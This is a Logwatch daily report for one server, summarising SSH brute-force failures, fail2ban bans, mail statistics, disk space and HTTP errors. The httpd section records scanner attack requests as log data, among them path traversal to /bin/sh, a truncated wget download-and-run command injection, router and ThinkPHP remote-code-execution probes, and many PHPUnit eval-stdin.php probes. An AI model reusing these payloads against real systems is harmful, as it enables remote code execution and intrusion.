################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Mon May 27 04:42:03 2024 Date Range Processed: yesterday ( 2024-May-26 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 10:10 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 141.98.11.79 -> google.com:443: 1 Time(s) 87.121.69.52 -> google.com:443: 3 Time(s) A total of 6 sites probed the server 107.170.247.22 162.243.141.18 185.91.69.110 198.235.24.221 36.140.56.220 78.153.140.177 Requests with error response codes 400 Bad Request /: 6 Time(s) *: 4 Time(s) google.com:443: 4 Time(s) null: 4 Time(s) 1,: 2 Time(s) (Windows: 1 Time(s) /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%3 ... 5%%32%65/bin/sh: 1 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... %2e/.%2e/bin/sh: 1 Time(s) /cgi-bin/authLogin.cgi: 1 Time(s) /favicon.ico: 1 Time(s) /query?q=SHOW+DIAGNOSTICS: 1 Time(s) /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F% ... Farm7%20jaws%3B: 1 Time(s) /solr/admin/cores?action=STATUS&wt=json: 1 Time(s) /solr/admin/info/system: 1 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s) /v2/_catalog: 1 Time(s) \x0C\xD3\x86\x1E\xD8\xA1\xDD\xB6\xBD\xA8\x ... x09\xC0\x13\xC0: 1 Time(s) \xEFaO\xEB5\xFE\x81\xE0y\xB0f\x96\xCB\x02q ... D\xC0$\xC0(\xC0: 1 Time(s) mstshash=Administr: 1 Time(s) stager64: 1 Time(s) 499 (undefined) /.env: 1 Time(s) 500 Internal Server Error /: 21 Time(s) /favicon.ico: 3 Time(s) /cgi-bin/luci/;stok=/locale?form=country&o ... 20.%2Ftenda.sh): 2 Time(s) /.git/config: 1 Time(s) /HNAP1: 1 Time(s) /SiteLoader: 1 Time(s) /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /WuEL: 1 Time(s) /a: 1 Time(s) /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /ajax: 1 Time(s) /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /download/file.ext: 1 Time(s) /evox/about: 1 Time(s) /geoserver/web/: 1 Time(s) /index.php?lang=../../../../../../../../tmp/index1: 1 Time(s) /index.php?lang=../../../../../../../../us ... /tmp/index1.php: 1 Time(s) /index.php?s=/index/\x5Cthink\x5Capp/invok ... vars[1][]=Hello: 1 Time(s) /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /lib/phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /lib/phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /lib/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /mPlayer: 1 Time(s) /odinhttpcall1716740861: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/x.js: 1 Time(s) /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /public/index.php?s=/index/\x5Cthink\x5Cap ... vars[1][]=Hello: 1 Time(s) /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /sdk: 1 Time(s) /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /vendor/phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /vendor/phpunit/phpunit/LICENSE/eval-stdin.php: 1 Time(s) /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php: 1 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /vendor/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /version: 1 Time(s) /webui/: 1 Time(s) /workspace/drupal/vendor/phpunit/phpunit/s ... /eval-stdin.php: 1 Time(s) /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) 502 Bad Gateway /Z7JgFtprRTu4mj0ux-SJ3w/pdf: 1 Time(s) /ak_wiki/pdf: 1 Time(s) /reader_onlinezapf_notizen_und_ideen/pdf: 1 Time(s) /w1op49QpSGyk43xo0up_Aw/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (81.4.110.216): 33 Time(s) root (183.81.169.238): 30 Time(s) root (123.147.165.10): 6 Time(s) root (43.254.158.196): 6 Time(s) root (58.208.255.206): 6 Time(s) unknown (121.152.45.237): 4 Time(s) unknown (165.22.221.215): 3 Time(s) root (222.187.92.132): 1 Time(s) unknown (185.196.8.151): 1 Time(s) unknown (58.48.37.54): 1 Time(s) unknown (72.137.182.18): 1 Time(s) unknown (syn-071-083-063-090.biz.spectrum.com): 1 Time(s) Invalid Users: Unknown Account: 11 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 11 Miscellaneous warnings 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 46 Connections 46 Connections lost (inbound) 46 Disconnections 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- Connections (secure-log) Begin ------------------------ **Unmatched Entries** systemd-logind: New seat seat0.: 1 Time(s) ---------------------- Connections (secure-log) End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ SSHD Started: 2 Time(s) Disconnecting after too many authentication failures for user: root : 1 Time(s) Failed logins from: 43.254.158.196: 6 times 58.208.255.206: 6 times 81.4.110.216: 33 times 123.147.165.10: 6 times 183.81.169.238: 30 times 222.187.92.132: 1 time Illegal users from: 2001:470:1:332::5 (scan-39af.shadowserver.org): 1 time undef: 12 times 58.48.37.54: 1 time 64.62.156.104 (scan-66-10.shadowserver.org): 1 time 71.83.63.90 (syn-071-083-063-090.biz.spectrum.com): 1 time 72.137.182.18 (unallocated-static.rogers.com): 1 time 121.152.45.237: 4 times 139.224.239.172: 6 times 165.22.221.215: 3 times 185.196.8.151: 1 time **Unmatched Entries** Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 5 time(s) userauth_pubkey: unsupported public key algorithm: rsa-sha2-512 [preauth] : 33 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop22185p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################